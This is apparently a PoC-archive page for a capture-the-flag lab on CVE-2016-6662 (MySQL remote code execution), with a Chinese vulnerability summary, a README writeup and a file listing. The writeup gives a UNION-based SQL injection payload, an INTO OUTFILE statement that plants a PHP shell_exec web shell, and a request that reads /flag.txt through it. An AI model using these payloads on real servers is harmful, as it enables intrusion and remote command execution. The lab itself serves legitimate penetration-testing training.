关联漏洞
标题:
Oracle MySQL 远程代码执行漏洞/提权漏洞
(CVE-2016-6662)
描述:Oracle MySQL是美国甲骨文(Oracle)公司的一套开源的关系数据库管理系统。该数据库系统具有性能高、成本低、可靠性好等特点。 Oracle MySQL中的配置文件(my.cnf)存在远程代码执行漏洞。攻击者(本地或远程)可通过授权访问MySQL数据库(网络连接或类似phpMyAdmin的Web接口)或SQL注入方式,利用该漏洞向配置文件中注入恶意的数据库配置,导致以root权限执行任意代码,完全控制受影响的服务器。以下版本受到影响:Oracle MySQL 5.5.52及之前的版本,5.6.x
描述
This lab dedicated to learning penetration testing skill with CVE-2016-6662: MySQL Remote Root Code Execution
介绍
## About this lab
This lab is dedicated for learning penetration testing skill through *CVE-2016-6662: MySQL Remote Root Code Execution*
### Core logic:
The problem with this CVE lies in the secure_file_priv variable, which was added in MySQL version 5.5.53.
It was supposed to add a layer of security since it restricted the privilege to read or write anywhere, which happened a lot back then.
However, in the early stages of version 5.6 up to version 5.7.6, the default value of secure_file_priv is null, so nothing is changed if the database admin doesn't take extra notice at that point.
### Writeup:
1. The first part of the flag is inside the database, you will get it with this payload: `1 UNION SELECT NULL, flag from flags`
2. The second part of the flag is located at the root folder of the server. You first create a PHP shell code with this:
```
select '<?php $output=shell_exec($_GET["cmd"]);
echo "<pre>".$output."</pre>"?>' into outfile '/var/www/html/shell.php' from mysql.user limit 1;
```
This create a PHP file with cmd parameter that take value from input and parse it to shell_exec() function - a PHP function that executing shell command.
3. With that parameter, you will get: `/shell.php?cmd=cat /flag.txt`.
4. You get the flag.
文件快照
[4.0K] /data/pocs/7fb39e7a83f8a7c127d59b1d836b9b8e3430020d
├── [4.0K] db
│ ├── [ 187] Dockerfile
│ └── [1.0K] dump.sql
├── [ 777] docker-compose.yaml
├── [ 108] Dockerfile
├── [ 63] flag.txt
├── [1.2K] README.md
└── [4.0K] src
├── [1.1K] ajax.php
├── [4.0K] css
│ ├── [103K] bootstrap.min.css
│ ├── [6.8K] magnific-popup.css
│ └── [4.7K] templatemo-style.css
├── [4.0K] img
│ ├── [280K] neaty-01.jpg
│ ├── [124K] neaty-02.jpg
│ ├── [118K] neaty-03.jpg
│ ├── [ 89K] neaty-04.jpg
│ ├── [ 72K] neaty-05.jpg
│ ├── [184K] neaty-06.jpg
│ ├── [109K] neaty-07.jpg
│ ├── [ 80K] neaty-08.jpg
│ ├── [123K] neaty-09.jpg
│ ├── [ 95K] neaty-10.jpg
│ ├── [178K] neaty-11.jpg
│ ├── [173K] neaty-12.jpg
│ ├── [140K] neaty-13.jpg
│ ├── [129K] neaty-14.jpg
│ └── [4.2K] tm-neaty-logo.png
├── [ 15K] index.html
└── [4.0K] js
├── [ 94K] jquery-1.11.3.min.js
├── [ 20K] jquery.magnific-popup.min.js
├── [2.5K] jquery.singlePageNav.min.js
└── [2.0K] main.js
5 directories, 30 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。